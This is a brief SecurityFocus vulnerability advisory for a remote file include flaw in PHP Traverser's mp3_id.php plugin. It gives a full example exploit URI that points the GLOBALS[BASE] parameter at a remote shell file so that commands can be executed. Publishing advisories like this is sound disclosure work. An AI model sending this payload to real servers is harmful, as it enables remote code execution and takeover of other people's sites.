PHP Traverser 'mp3_id.php' Remote File Include Vulnerability

Attackers can exploit this issue through a browser.

The following example URI is available:

http://www.example.com/[path]/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://www.example.com/shell.txt?cmd


 

Privacy Statement
Copyright 2010, SecurityFocus